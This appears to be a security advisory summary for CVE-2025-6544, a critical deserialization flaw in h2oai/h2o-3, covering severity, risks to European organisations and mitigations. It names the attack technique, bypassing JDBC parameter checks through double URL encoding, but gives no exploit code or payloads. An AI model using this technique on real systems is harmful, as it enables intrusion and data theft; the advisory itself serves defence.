CVE-2025-6544 is a critical deserialization vulnerability (CWE-502) affecting the h2oai/h2o-3 software versions up to and including 3.46.0.8. The vulnerability stems from improper handling of JDBC connection parameters within the application. Specifically, the software fails to adequately validate and sanitize input parameters, allowing attackers to bypass regular expression checks by employing double URL encoding techniques. This flaw enables an attacker to craft malicious serialized data that, when processed by the vulnerable application, can lead to arbitrary code execution and unauthorized reading of system files. The vulnerability does not require authentication or user interaction, making it remotely exploitable over the network (AV:N). The CVSS v3.0 base score is 9.8, indicating a critical severity with high impact on confidentiality, integrity, and availability. Exploitation could allow attackers to fully compromise affected systems, execute arbitrary commands, and access sensitive data. Although no known exploits are currently reported in the wild, the ease of exploitation and the severity of impact make this a significant threat to all users of the affected h2oai/h2o-3 versions.

For European organizations, the impact of this vulnerability could be severe, especially for those relying on h2oai/h2o-3 for machine learning, data analytics, or AI-driven decision-making processes. Successful exploitation could lead to full system compromise, data breaches involving sensitive or personal data protected under GDPR, disruption of critical business operations, and potential reputational damage. Given the criticality of the vulnerability and the lack of required authentication, attackers could leverage this flaw to infiltrate networks, move laterally, and establish persistent access. This poses a substantial risk to sectors such as finance, healthcare, telecommunications, and government institutions across Europe, where data confidentiality and system availability are paramount. Additionally, the ability to read arbitrary system files could expose cryptographic keys, credentials, or configuration files, further exacerbating the risk of broader compromise.

Organizations should immediately assess their deployment of h2oai/h2o-3 and identify any instances running versions up to 3.46.0.8. Since no official patch links are provided yet, it is critical to monitor vendor advisories for updates or patches addressing this vulnerability. In the interim, organizations should implement strict input validation and sanitization on all JDBC connection parameters, employing allowlists and rejecting suspicious or double-encoded inputs. Network-level protections such as web application firewalls (WAFs) should be configured to detect and block malicious payloads targeting deserialization flaws and unusual URL encoding patterns. Restricting access to the h2o-3 service to trusted internal networks or VPNs can reduce exposure. Additionally, applying the principle of least privilege to the service account running h2o-3 can limit the potential damage from exploitation. Continuous monitoring for anomalous behavior and deploying endpoint detection and response (EDR) tools can help identify exploitation attempts early. Finally, organizations should prepare incident response plans specific to deserialization attacks and ensure backups are current and secure.